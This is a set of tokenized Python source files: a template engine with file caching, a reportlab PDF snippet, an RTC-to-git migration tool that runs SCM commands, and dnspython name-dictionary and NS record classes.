append ( text [ <NUM_LIT:0> : - <NUM_LIT:2> ] ) <EOL> buf . append ( "<STR_LIT>" ) <EOL> else : <EOL> buf . append ( text [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> buf . append ( "<STR_LIT>" ) <EOL> _add_text = add_text <EOL> def add_expr ( self , buf , code , flag_escape = None ) : <EOL> if not code or code . isspace ( ) : <EOL> return <EOL> if flag_escape is None : <EOL> buf . append ( code ) ; buf . append ( "<STR_LIT:U+002CU+0020>" ) ; <EOL> elif flag_escape is False : <EOL> buf . extend ( ( self . tostrfunc , "<STR_LIT:(>" , code , "<STR_LIT>" ) ) <EOL> else : <EOL> buf . extend ( ( self . escapefunc , "<STR_LIT:(>" , self . tostrfunc , "<STR_LIT:(>" , code , "<STR_LIT>" ) ) <EOL> def add_stmt ( self , buf , code ) : <EOL> if self . newline == "<STR_LIT:\r\n>" : <EOL> code = code . replace ( "<STR_LIT:\r\n>" , "<STR_LIT:\n>" ) <EOL> buf . append ( code ) <EOL> def _set_spaces ( self , code , lspace , mspace ) : <EOL> if lspace : <EOL> if mspace == "<STR_LIT:U+0020>" : <EOL> code = lspace + code <EOL> elif mspace == "<STR_LIT:\t>" : <EOL> code = lspace + "<STR_LIT:\t>" + code <EOL> i = code . rstrip ( ) . rfind ( "<STR_LIT:\n>" ) + <NUM_LIT:1> <EOL> indent = <NUM_LIT:0> <EOL> n = len ( code ) <EOL> ch = None <EOL> while i < n : <EOL> ch = code [ i ] <EOL> if ch == "<STR_LIT:U+0020>" : indent += <NUM_LIT:1> <EOL> elif ch == "<STR_LIT:\t>" : indent += <NUM_LIT:8> <EOL> else : break <EOL> i += <NUM_LIT:1> <EOL> if ch : <EOL> if code . rstrip ( ) [ - <NUM_LIT:1> ] == '<STR_LIT::>' : <EOL> indent += self . indent <EOL> self . _spaces = '<STR_LIT:U+0020>' * indent <EOL> def render ( self , context = None , globals = None , _buf = None ) : <EOL> """<STR_LIT>""" <EOL> if context is None : <EOL> locals = context = { } <EOL> elif self . args is None : <EOL> locals = context . copy ( ) <EOL> else : <EOL> locals = { } <EOL> if context . has_key ( '<STR_LIT>' ) : <EOL> context . get ( '<STR_LIT>' ) . 
hook_context ( locals ) <EOL> locals [ '<STR_LIT>' ] = context <EOL> if globals is None : <EOL> globals = sys . _getframe ( <NUM_LIT:1> ) . f_globals <EOL> bufarg = _buf <EOL> if _buf is None : <EOL> _buf = [ ] <EOL> locals [ '<STR_LIT>' ] = _buf <EOL> if not self . bytecode : <EOL> self . compile ( ) <EOL> exec self . bytecode in globals , locals <EOL> if bufarg is None : <EOL> s = '<STR_LIT>' . join ( _buf ) <EOL> return s <EOL> else : <EOL> return None <EOL> def compile ( self ) : <EOL> """<STR_LIT>""" <EOL> self . bytecode = compile ( self . script , self . filename or '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Preprocessor ( Template ) : <EOL> STMT_PATTERN = Template . compile_stmt_pattern ( '<STR_LIT>' ) <EOL> def stmt_pattern ( self ) : <EOL> return Preprocessor . STMT_PATTERN <EOL> EXPR_PATTERN = re . compile ( r'<STR_LIT>' , re . S ) <EOL> def expr_pattern ( self ) : <EOL> return Preprocessor . EXPR_PATTERN <EOL> def add_expr ( self , buf , code , flag_escape = None ) : <EOL> if not code or code . isspace ( ) : <EOL> return <EOL> code = "<STR_LIT>" % code <EOL> Template . add_expr ( self , buf , code , flag_escape ) <EOL> class Engine ( object ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' <EOL> postfix = '<STR_LIT>' <EOL> layout = None <EOL> templateclass = Template <EOL> path = None <EOL> cache = False <EOL> preprocess = False <EOL> def __init__ ( self , prefix = None , postfix = None , layout = None , path = None , cache = None , preprocess = None , templateclass = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if prefix : self . prefix = prefix <EOL> if postfix : self . postfix = postfix <EOL> if layout : self . layout = layout <EOL> if templateclass : self . templateclass = templateclass <EOL> if path is not None : self . path = path <EOL> if cache is not None : self . cache = cache <EOL> if preprocess is not None : self . preprocess = preprocess <EOL> self . kwargs = kwargs <EOL> self . 
templates = { } <EOL> def to_filename ( self , template_name ) : <EOL> """<STR_LIT>""" <EOL> if template_name [ <NUM_LIT:0> ] == '<STR_LIT::>' : <EOL> return self . prefix + template_name [ <NUM_LIT:1> : ] + self . postfix <EOL> return template_name <EOL> def find_template_file ( self , template_name ) : <EOL> """<STR_LIT>""" <EOL> filename = self . to_filename ( template_name ) <EOL> if self . path : <EOL> for dirname in self . path : <EOL> filepath = dirname + os . path . sep + filename <EOL> if os . path . isfile ( filepath ) : <EOL> return filepath <EOL> else : <EOL> if os . path . isfile ( filename ) : <EOL> return filename <EOL> raise IOError ( '<STR_LIT>' % ( filename , repr ( self . path ) ) ) <EOL> def register_template ( self , template_name , template ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( template , '<STR_LIT>' ) : <EOL> template . timestamp = None <EOL> self . templates [ template_name ] = template <EOL> def load_cachefile ( self , cache_filename , template ) : <EOL> """<STR_LIT>""" <EOL> dct = marshal . load ( open ( cache_filename , '<STR_LIT:rb>' ) ) <EOL> template . args = dct [ '<STR_LIT:args>' ] <EOL> template . script = dct [ '<STR_LIT>' ] <EOL> template . bytecode = dct [ '<STR_LIT>' ] <EOL> def _load_cachefile_for_script ( self , cache_filename , template ) : <EOL> s = open ( cache_filename ) . read ( ) <EOL> if s . startswith ( '<STR_LIT>' ) : <EOL> pos = s . find ( "<STR_LIT:\n>" ) <EOL> args_str = s [ len ( '<STR_LIT>' ) : pos ] <EOL> template . args = args_str and args_str . split ( '<STR_LIT:U+002CU+0020>' ) or [ ] <EOL> s = s [ pos + <NUM_LIT:1> : ] <EOL> else : <EOL> template . args = None <EOL> if template . encoding : <EOL> s = s . decode ( '<STR_LIT:utf-8>' ) <EOL> template . script = s <EOL> template . compile ( ) <EOL> def store_cachefile ( self , cache_filename , template ) : <EOL> """<STR_LIT>""" <EOL> dct = { '<STR_LIT:args>' : template . args , <EOL> '<STR_LIT>' : template . script , <EOL> '<STR_LIT>' : template . 
bytecode } <EOL> _write_file_with_lock ( cache_filename , marshal . dumps ( dct ) ) <EOL> def _store_cachefile_for_script ( self , cache_filename , template ) : <EOL> s = template . script <EOL> if template . encoding and isinstance ( s , unicode ) : <EOL> s = s . encode ( template . encoding ) <EOL> if template . args is not None : <EOL> s = "<STR_LIT>" % ( '<STR_LIT:U+002CU+0020>' . join ( template . args ) , s ) <EOL> _write_file_with_lock ( cache_filename , s ) <EOL> def cachename ( self , filename ) : <EOL> return os . path . join ( os . path . expanduser ( '<STR_LIT>' ) , '<STR_LIT>' , os . path . basename ( filename ) + '<STR_LIT>' ) <EOL> def create_template ( self , filename , _context , _globals ) : <EOL> """<STR_LIT>""" <EOL> template = self . templateclass ( None , ** self . kwargs ) <EOL> template . timestamp = time . time ( ) <EOL> cache_filename = self . cachename ( filename ) <EOL> getmtime = os . path . getmtime <EOL> if not self . cache : <EOL> input = self . read_template_file ( filename , _context , _globals ) <EOL> template . convert ( input , filename ) <EOL> elif os . path . exists ( cache_filename ) and getmtime ( cache_filename ) >= getmtime ( filename ) : <EOL> template . filename = filename <EOL> self . load_cachefile ( cache_filename , template ) <EOL> if template . bytecode is None : <EOL> template . compile ( ) <EOL> else : <EOL> input = self . read_template_file ( filename , _context , _globals ) <EOL> template . convert ( input , filename ) <EOL> template . compile ( ) <EOL> self . store_cachefile ( cache_filename , template ) <EOL> return template <EOL> def read_template_file ( self , filename , _context , _globals ) : <EOL> if not self . preprocess : <EOL> return open ( filename ) . read ( ) <EOL> if _context is None : <EOL> _context = { } <EOL> if not _context . has_key ( '<STR_LIT>' ) : <EOL> self . hook_context ( _context ) <EOL> if _globals is None : <EOL> _globals = sys . _getframe ( <NUM_LIT:2> ) . 
f_globals <EOL> preprocessor = Preprocessor ( filename ) <EOL> return preprocessor . render ( _context , globals = _globals ) <EOL> def get_template ( self , template_name , _context = None , _globals = None ) : <EOL> """<STR_LIT>""" <EOL> template = self . templates . get ( template_name ) <EOL> t = template <EOL> if t is None or t . timestamp and t . filename and t . timestamp < os . path . getmtime ( t . filename ) : <EOL> filename = self . find_template_file ( template_name ) <EOL> if _globals is None : <EOL> _globals = sys . _getframe ( <NUM_LIT:1> ) . f_globals <EOL> template = self . create_template ( filename , _context , _globals ) <EOL> self . register_template ( template_name , template ) <EOL> return template <EOL> def include ( self , template_name , append_to_buf = True ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> locals = frame . f_locals <EOL> globals = frame . f_globals <EOL> assert locals . has_key ( '<STR_LIT>' ) <EOL> context = locals [ '<STR_LIT>' ] <EOL> template = self . get_template ( template_name , context , globals ) <EOL> if append_to_buf : <EOL> _buf = locals [ '<STR_LIT>' ] <EOL> else : <EOL> _buf = None <EOL> return template . render ( context , globals , _buf = _buf ) <EOL> def render ( self , template_name , context = None , globals = None , layout = True ) : <EOL> """<STR_LIT>""" <EOL> if context is None : <EOL> context = { } <EOL> if globals is None : <EOL> globals = sys . _getframe ( <NUM_LIT:1> ) . f_globals <EOL> self . hook_context ( context ) <EOL> while True : <EOL> template = self . get_template ( template_name , context , globals ) <EOL> content = template . render ( context , globals ) <EOL> layout = context . pop ( '<STR_LIT>' , layout ) <EOL> if layout is True or layout is None : <EOL> layout = self . layout <EOL> if not layout : <EOL> break <EOL> template_name = layout <EOL> layout = False <EOL> context [ '<STR_LIT>' ] = content <EOL> context . 
pop ( '<STR_LIT>' , None ) <EOL> return content <EOL> def hook_context ( self , context ) : <EOL> context [ '<STR_LIT>' ] = self <EOL> context [ '<STR_LIT>' ] = self . include </s>
<s> from reportlab . platypus import SimpleDocTemplate , Paragraph <EOL> from reportlab . lib . styles import ParagraphStyle <EOL> from reportlab . lib . styles import getSampleStyleSheet <EOL> from reportlab . lib . enums import TA_JUSTIFY <EOL> def go ( ) : <EOL> styles = getSampleStyleSheet ( ) <EOL> doc = SimpleDocTemplate ( "<STR_LIT>" ) <EOL> style = styles [ '<STR_LIT>' ] <EOL> style . alignment = TA_JUSTIFY <EOL> p1 = Paragraph ( '''<STR_LIT>''' , style ) <EOL> doc . build ( [ p1 , ] ) <EOL> go ( ) </s>
<s> import sys <EOL> import os <EOL> import re <EOL> from enum import Enum , unique <EOL> import configuration <EOL> from configuration import ComponentBaseLineEntry <EOL> import sorter <EOL> import shell <EOL> import shouter <EOL> from gitFunctions import Commiter , Differ <EOL> class RTCInitializer : <EOL> @ staticmethod <EOL> def initialize ( ) : <EOL> RTCLogin . loginandcollectstreamuuid ( ) <EOL> workspace = WorkspaceHandler ( ) <EOL> config = configuration . get ( ) <EOL> if config . useexistingworkspace : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> workspace . load ( ) <EOL> else : <EOL> workspace . createandload ( config . streamuuid , config . initialcomponentbaselines ) <EOL> class RTCLogin : <EOL> @ staticmethod <EOL> def loginandcollectstreamuuid ( ) : <EOL> config = configuration . get ( ) <EOL> shell . execute ( "<STR_LIT>" % ( config . scmcommand , config . repo , config . user , config . password ) ) <EOL> config . collectstreamuuids ( ) <EOL> @ staticmethod <EOL> def logout ( ) : <EOL> config = configuration . get ( ) <EOL> shell . execute ( "<STR_LIT>" % ( config . scmcommand , config . repo ) ) <EOL> class WorkspaceHandler : <EOL> def __init__ ( self ) : <EOL> self . config = configuration . get ( ) <EOL> self . workspace = self . config . workspace <EOL> self . repo = self . config . repo <EOL> self . scmcommand = self . config . scmcommand <EOL> def createandload ( self , stream , componentbaselineentries = [ ] ) : <EOL> shell . execute ( "<STR_LIT>" % ( self . scmcommand , self . repo , stream , self . workspace ) ) <EOL> if componentbaselineentries : <EOL> self . setcomponentstobaseline ( componentbaselineentries , stream ) <EOL> else : <EOL> self . setcomponentstobaseline ( ImportHandler ( ) . determineinitialbaseline ( stream ) , <EOL> stream ) <EOL> self . load ( ) <EOL> def load ( self ) : <EOL> command = "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace ) <EOL> if self . config . 
includecomponentroots : <EOL> command += "<STR_LIT>" <EOL> shouter . shout ( "<STR_LIT>" + command ) <EOL> shell . execute ( command ) <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> Commiter . restore_shed_gitignore ( Commiter . get_untracked_statuszlines ( ) ) <EOL> def setcomponentstobaseline ( self , componentbaselineentries , streamuuid ) : <EOL> for entry in componentbaselineentries : <EOL> shouter . shout ( "<STR_LIT>" % ( entry . componentname , entry . component , <EOL> entry . baselinename , entry . baseline ) ) <EOL> replacecommand = "<STR_LIT>" % ( self . scmcommand , self . repo , entry . baseline , self . workspace , streamuuid , entry . component ) <EOL> shell . execute ( replacecommand ) <EOL> def setnewflowtargets ( self , streamuuid ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> if not self . hasflowtarget ( streamuuid ) : <EOL> shell . execute ( "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace , streamuuid ) ) <EOL> command = "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace , streamuuid ) <EOL> shell . execute ( command ) <EOL> def hasflowtarget ( self , streamuuid ) : <EOL> command = "<STR_LIT>" % ( self . scmcommand , self . repo , self . workspace ) <EOL> flowtargetlines = shell . getoutput ( command ) <EOL> for flowtargetline in flowtargetlines : <EOL> splittedinformationline = flowtargetline . split ( "<STR_LIT>" ) <EOL> uuidpart = splittedinformationline [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+0020>" ) <EOL> flowtargetuuid = uuidpart [ <NUM_LIT:0> ] . strip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if streamuuid in flowtargetuuid : <EOL> return True <EOL> return False <EOL> class Changes : <EOL> latest_accept_command = "<STR_LIT>" <EOL> @ staticmethod <EOL> def discard ( * changeentries ) : <EOL> config = configuration . get ( ) <EOL> idstodiscard = Changes . _collectids ( changeentries ) <EOL> exitcode = shell . execute ( config . scmcommand + "<STR_LIT>" + config . workspace + "<STR_LIT>" + config . 
repo + "<STR_LIT>" + idstodiscard ) <EOL> if exitcode is <NUM_LIT:0> : <EOL> for changeEntry in changeentries : <EOL> changeEntry . setUnaccepted ( ) <EOL> @ staticmethod <EOL> def accept ( logpath , * changeentries ) : <EOL> for changeEntry in changeentries : <EOL> shouter . shout ( "<STR_LIT>" + changeEntry . tostring ( ) ) <EOL> revisions = Changes . _collectids ( changeentries ) <EOL> config = configuration . get ( ) <EOL> Changes . latest_accept_command = config . scmcommand + "<STR_LIT>" + config . repo + "<STR_LIT>" + config . workspace + "<STR_LIT>" + revisions <EOL> exitcode = shell . execute ( Changes . latest_accept_command , logpath , "<STR_LIT:a>" ) <EOL> if exitcode is <NUM_LIT:0> : <EOL> for changeEntry in changeentries : <EOL> changeEntry . setAccepted ( ) <EOL> return True <EOL> else : <EOL> return False <EOL> @ staticmethod <EOL> def _collectids ( changeentries ) : <EOL> ids = "<STR_LIT>" <EOL> for changeentry in changeentries : <EOL> ids += "<STR_LIT:U+0020>" + changeentry . revision <EOL> return ids <EOL> @ staticmethod <EOL> def tostring ( * changes ) : <EOL> logmessage = "<STR_LIT>" <EOL> for change in changes : <EOL> logmessage += change . tostring ( ) + "<STR_LIT:\n>" <EOL> shouter . shout ( logmessage ) <EOL> class ImportHandler : <EOL> def __init__ ( self ) : <EOL> self . config = configuration . get ( ) <EOL> self . acceptlogpath = self . config . getlogpath ( "<STR_LIT>" ) <EOL> def getcomponentbaselineentriesfromstream ( self , stream ) : <EOL> filename = self . config . getlogpath ( "<STR_LIT>" + stream + "<STR_LIT>" ) <EOL> command = "<STR_LIT>" % ( self . config . scmcommand , <EOL> self . config . repo , stream ) <EOL> shell . 
execute ( command , filename ) <EOL> componentbaselinesentries = [ ] <EOL> skippedfirstrow = False <EOL> islinewithcomponent = <NUM_LIT:2> <EOL> component = "<STR_LIT>" <EOL> baseline = "<STR_LIT>" <EOL> componentname = "<STR_LIT>" <EOL> baselinename = "<STR_LIT>" <EOL> with open ( filename , '<STR_LIT:r>' , encoding = shell . encoding ) as file : <EOL> for line in file : <EOL> cleanedline = line . strip ( ) <EOL> if cleanedline : <EOL> if not skippedfirstrow : <EOL> skippedfirstrow = True <EOL> continue <EOL> splittedinformationline = line . split ( "<STR_LIT>" ) <EOL> uuidpart = splittedinformationline [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+0020>" ) <EOL> if islinewithcomponent % <NUM_LIT:2> is <NUM_LIT:0> : <EOL> component = uuidpart [ <NUM_LIT:3> ] . strip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> componentname = splittedinformationline [ <NUM_LIT:1> ] <EOL> else : <EOL> baseline = uuidpart [ <NUM_LIT:5> ] . strip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> baselinename = splittedinformationline [ <NUM_LIT:1> ] <EOL> if baseline and component : <EOL> componentbaselinesentries . append ( <EOL> ComponentBaseLineEntry ( component , baseline , componentname , baselinename ) ) <EOL> baseline = "<STR_LIT>" <EOL> component = "<STR_LIT>" <EOL> componentname = "<STR_LIT>" <EOL> baselinename = "<STR_LIT>" <EOL> islinewithcomponent += <NUM_LIT:1> <EOL> return componentbaselinesentries <EOL> def determineinitialbaseline ( self , stream ) : <EOL> regex = "<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> config = self . config <EOL> componentbaselinesentries = self . getcomponentbaselineentriesfromstream ( stream ) <EOL> for entry in componentbaselinesentries : <EOL> shouter . shout ( "<STR_LIT>" + entry . componentname ) <EOL> command = "<STR_LIT>" % ( entry . component , config . repo , config . user , config . password ) <EOL> baselineslines = shell . getoutput ( command ) <EOL> baselineslines . 
reverse ( ) <EOL> for baselineline in baselineslines : <EOL> matcher = pattern . search ( baselineline ) <EOL> if matcher : <EOL> matchedstring = matcher . group ( ) <EOL> uuid = matchedstring [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> entry . baseline = uuid <EOL> entry . baselinename = "<STR_LIT>" <EOL> shouter . shout ( "<STR_LIT>" % baselineline ) <EOL> break <EOL> return componentbaselinesentries <EOL> def acceptchangesintoworkspace ( self , changeentries ) : <EOL> amountofchanges = len ( changeentries ) <EOL> shouter . shoutwithdate ( "<STR_LIT>" % amountofchanges ) <EOL> amountofacceptedchanges = <NUM_LIT:0> <EOL> for changeEntry in changeentries : <EOL> amountofacceptedchanges += <NUM_LIT:1> <EOL> if not changeEntry . isAccepted ( ) : <EOL> if not Changes . accept ( self . acceptlogpath , changeEntry ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> if not Differ . has_diff ( ) : <EOL> WorkspaceHandler ( ) . load ( ) <EOL> shouter . shout ( "<STR_LIT>" % ( amountofacceptedchanges , amountofchanges ) ) <EOL> Commiter . addandcommit ( changeEntry ) <EOL> return amountofacceptedchanges <EOL> @ staticmethod <EOL> def collect_changes_to_accept_to_avoid_conflicts ( changewhichcantbeacceptedalone , changes , maxchangesetstoaccepttogether ) : <EOL> changestoaccept = [ changewhichcantbeacceptedalone ] <EOL> nextchange = ImportHandler . getnextchangeset_fromsamecomponent ( changewhichcantbeacceptedalone , changes ) <EOL> while True : <EOL> if nextchange and len ( changestoaccept ) < maxchangesetstoaccepttogether : <EOL> changestoaccept . append ( nextchange ) <EOL> nextchange = ImportHandler . getnextchangeset_fromsamecomponent ( nextchange , changes ) <EOL> else : <EOL> break <EOL> return changestoaccept <EOL> def retryacceptincludingnextchangesets ( self , change , changes ) : <EOL> issuccessful = False <EOL> changestoaccept = ImportHandler . collect_changes_to_accept_to_avoid_conflicts ( change , changes , self . config . 
maxchangesetstoaccepttogether ) <EOL> amountofchangestoaccept = len ( changestoaccept ) <EOL> if amountofchangestoaccept > <NUM_LIT:1> : <EOL> Changes . tostring ( * changestoaccept ) <EOL> if self . config . useautomaticconflictresolution or self . is_user_agreeing_to_accept_next_change ( change ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> for index in range ( <NUM_LIT:1> , amountofchangestoaccept ) : <EOL> toaccept = changestoaccept [ <NUM_LIT:0> : index + <NUM_LIT:1> ] <EOL> if Changes . accept ( self . acceptlogpath , * toaccept ) : <EOL> issuccessful = True <EOL> break <EOL> if not issuccessful : <EOL> self . is_user_aborting ( change ) <EOL> @ staticmethod <EOL> def is_user_agreeing_to_accept_next_change ( change ) : <EOL> messagetoask = "<STR_LIT>" <EOL> while True : <EOL> answer = input ( messagetoask ) . lower ( ) <EOL> if answer == "<STR_LIT:y>" : <EOL> return True <EOL> elif answer == "<STR_LIT:n>" : <EOL> return not ImportHandler . is_user_aborting ( change ) <EOL> else : <EOL> shouter . shout ( "<STR_LIT>" + answer ) <EOL> @ staticmethod <EOL> def is_user_aborting ( change ) : <EOL> shouter . shout ( "<STR_LIT>" + Changes . latest_accept_command ) <EOL> shouter . shout ( "<STR_LIT>" + Commiter . getcommitcommand ( change ) ) <EOL> reallycontinue = "<STR_LIT>" <EOL> if input ( reallycontinue ) . lower ( ) == "<STR_LIT:y>" : <EOL> return True <EOL> else : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def getnextchangeset_fromsamecomponent ( currentchangeentry , changeentries ) : <EOL> nextchangeentry = None <EOL> component = currentchangeentry . component <EOL> nextindex = changeentries . index ( currentchangeentry ) + <NUM_LIT:1> <EOL> while not nextchangeentry and nextindex < len ( changeentries ) : <EOL> candidateentry = changeentries [ nextindex ] <EOL> if not candidateentry . isAccepted ( ) and candidateentry . 
component == component : <EOL> nextchangeentry = candidateentry <EOL> nextindex += <NUM_LIT:1> <EOL> return nextchangeentry <EOL> def getchangeentriesofstreamcomponents ( self , componentbaselineentries ) : <EOL> missingchangeentries = { } <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> for componentBaseLineEntry in componentbaselineentries : <EOL> shouter . shout ( "<STR_LIT>" % <EOL> ( componentBaseLineEntry . baselinename , componentBaseLineEntry . componentname ) ) <EOL> changeentries = self . getchangeentriesofbaseline ( componentBaseLineEntry . baseline ) <EOL> for changeentry in changeentries : <EOL> missingchangeentries [ changeentry . revision ] = changeentry <EOL> return missingchangeentries <EOL> def readhistory ( self , componentbaselineentries , streamname ) : <EOL> if not self . config . useprovidedhistory : <EOL> warning = "<STR_LIT>" "<STR_LIT>" <EOL> shouter . shout ( warning ) <EOL> return None <EOL> historyuuids = { } <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> for componentBaseLineEntry in componentbaselineentries : <EOL> history = self . gethistory ( componentBaseLineEntry . componentname , streamname ) <EOL> historyuuids [ componentBaseLineEntry . component ] = history <EOL> return historyuuids <EOL> @ staticmethod <EOL> def getchangeentriestoaccept ( missingchangeentries , history ) : <EOL> changeentriestoaccept = [ ] <EOL> if history : <EOL> historywithchangeentryobject = { } <EOL> for key in history . keys ( ) : <EOL> currentuuids = history . get ( key ) <EOL> changeentries = [ ] <EOL> for uuid in currentuuids : <EOL> changeentry = missingchangeentries . get ( uuid ) <EOL> if changeentry : <EOL> changeentries . append ( changeentry ) <EOL> historywithchangeentryobject [ key ] = changeentries <EOL> changeentriestoaccept = sorter . tosortedlist ( historywithchangeentryobject ) <EOL> else : <EOL> changeentriestoaccept . extend ( missingchangeentries . values ( ) ) <EOL> changeentriestoaccept . sort ( key = lambda change : change . 
date ) <EOL> return changeentriestoaccept <EOL> @ staticmethod <EOL> def getchangeentriesfromfile ( outputfilename ) : <EOL> informationseparator = "<STR_LIT>" <EOL> numberofexpectedinformationseparators = <NUM_LIT:5> <EOL> changeentries = [ ] <EOL> component = "<STR_LIT>" <EOL> componentprefix = "<STR_LIT>" <EOL> with open ( outputfilename , '<STR_LIT:r>' , encoding = shell . encoding ) as file : <EOL> currentline = "<STR_LIT>" <EOL> currentinformationpresent = <NUM_LIT:0> <EOL> for line in file : <EOL> cleanedline = line . strip ( ) <EOL> if cleanedline : <EOL> if cleanedline . startswith ( componentprefix ) : <EOL> length = len ( componentprefix ) <EOL> component = cleanedline [ length : cleanedline . index ( "<STR_LIT:)>" , length ) ] <EOL> else : <EOL> currentinformationpresent += cleanedline . count ( informationseparator ) <EOL> if currentline : <EOL> currentline += os . linesep <EOL> currentline += cleanedline <EOL> if currentinformationpresent >= numberofexpectedinformationseparators : <EOL> splittedlines = currentline . split ( informationseparator ) <EOL> revisionwithbrackets = splittedlines [ <NUM_LIT:0> ] . strip ( ) <EOL> revision = revisionwithbrackets [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> author = splittedlines [ <NUM_LIT:1> ] . strip ( ) <EOL> email = splittedlines [ <NUM_LIT:2> ] . strip ( ) <EOL> comment = splittedlines [ <NUM_LIT:3> ] . strip ( ) <EOL> date = splittedlines [ <NUM_LIT:4> ] . strip ( ) <EOL> changeentries . append ( ChangeEntry ( revision , author , email , date , comment , component ) ) <EOL> currentinformationpresent = <NUM_LIT:0> <EOL> currentline = "<STR_LIT>" <EOL> return changeentries <EOL> @ staticmethod <EOL> def getsimplehistoryfromfile ( outputfilename ) : <EOL> revisions = [ ] <EOL> if not os . path . isfile ( outputfilename ) : <EOL> shouter . shout ( "<STR_LIT>" + outputfilename ) <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> return revisions <EOL> with open ( outputfilename , '<STR_LIT:r>' , encoding = shell . 
encoding ) as file : <EOL> for line in file : <EOL> revisions . append ( line . strip ( ) ) <EOL> revisions . reverse ( ) <EOL> return revisions <EOL> def getchangeentriesofbaseline ( self , baselinetocompare ) : <EOL> return self . getchangeentriesbytypeandvalue ( CompareType . baseline , baselinetocompare ) <EOL> def getchangeentriesofstream ( self , streamtocompare ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> missingchangeentries = { } <EOL> changeentries = self . getchangeentriesbytypeandvalue ( CompareType . stream , streamtocompare ) <EOL> for changeentry in changeentries : <EOL> missingchangeentries [ changeentry . revision ] = changeentry <EOL> return missingchangeentries <EOL> def getchangeentriesbytypeandvalue ( self , comparetype , value ) : <EOL> dateformat = "<STR_LIT>" <EOL> outputfilename = self . config . getlogpath ( "<STR_LIT>" + comparetype . name + "<STR_LIT:_>" + value + "<STR_LIT>" ) <EOL> comparecommand = "<STR_LIT>" % ( self . config . scmcommand , self . config . workspace , comparetype . name , value , self . config . repo , <EOL> dateformat ) <EOL> shell . execute ( comparecommand , outputfilename ) <EOL> return ImportHandler . getchangeentriesfromfile ( outputfilename ) <EOL> def gethistory ( self , componentname , streamname ) : <EOL> outputfilename = self . config . gethistorypath ( "<STR_LIT>" % ( componentname , streamname ) ) <EOL> return ImportHandler . getsimplehistoryfromfile ( outputfilename ) <EOL> class ChangeEntry : <EOL> def __init__ ( self , revision , author , email , date , comment , component = "<STR_LIT>" ) : <EOL> self . revision = revision <EOL> self . author = author <EOL> self . email = email <EOL> self . date = date <EOL> self . comment = comment <EOL> self . component = component <EOL> self . setUnaccepted ( ) <EOL> def getgitauthor ( self ) : <EOL> authorrepresentation = "<STR_LIT>" % ( self . author , self . email ) <EOL> return shell . 
quote ( authorrepresentation ) <EOL> def setAccepted ( self ) : <EOL> self . accepted = True <EOL> def setUnaccepted ( self ) : <EOL> self . accepted = False <EOL> def isAccepted ( self ) : <EOL> return self . accepted <EOL> def tostring ( self ) : <EOL> return "<STR_LIT>" % ( self . comment , self . date , self . author , self . revision , self . component , self . accepted ) <EOL> @ unique <EOL> class CompareType ( Enum ) : <EOL> baseline = <NUM_LIT:1> <EOL> stream = <NUM_LIT:2> </s>
<s> """<STR_LIT>""" <EOL> import dns . name <EOL> import collections <EOL> class NameDict ( collections . MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . __store = dict ( ) <EOL> self . max_depth = <NUM_LIT:0> <EOL> self . max_depth_items = <NUM_LIT:0> <EOL> self . update ( dict ( * args , ** kwargs ) ) <EOL> def __update_max_depth ( self , key ) : <EOL> if len ( key ) == self . max_depth : <EOL> self . max_depth_items = self . max_depth_items + <NUM_LIT:1> <EOL> elif len ( key ) > self . max_depth : <EOL> self . max_depth = len ( key ) <EOL> self . max_depth_items = <NUM_LIT:1> <EOL> def __getitem__ ( self , key ) : <EOL> return self . __store [ key ] <EOL> def __setitem__ ( self , key , value ) : <EOL> if not isinstance ( key , dns . name . Name ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . __store [ key ] = value <EOL> self . __update_max_depth ( key ) <EOL> def __delitem__ ( self , key ) : <EOL> value = self . __store . pop ( key ) <EOL> if len ( value ) == self . max_depth : <EOL> self . max_depth_items = self . max_depth_items - <NUM_LIT:1> <EOL> if self . max_depth_items == <NUM_LIT:0> : <EOL> self . max_depth = <NUM_LIT:0> <EOL> for k in self . __store : <EOL> self . __update_max_depth ( k ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . __store ) <EOL> def __len__ ( self ) : <EOL> return len ( self . __store ) <EOL> def has_key ( self , key ) : <EOL> return self . __store . has_key ( key ) <EOL> def get_deepest_match ( self , name ) : <EOL> """<STR_LIT>""" <EOL> depth = len ( name ) <EOL> if depth > self . max_depth : <EOL> depth = self . max_depth <EOL> for i in xrange ( - depth , <NUM_LIT:0> ) : <EOL> n = dns . name . Name ( name [ i : ] ) <EOL> if self . has_key ( n ) : <EOL> return ( n , self [ n ] ) <EOL> v = self [ dns . name . empty ] <EOL> return ( dns . name . empty , v ) </s>
<s> import dns . rdtypes . nsbase <EOL> class NS ( dns . rdtypes . nsbase . NSBase ) : <EOL> """<STR_LIT>""" </s>
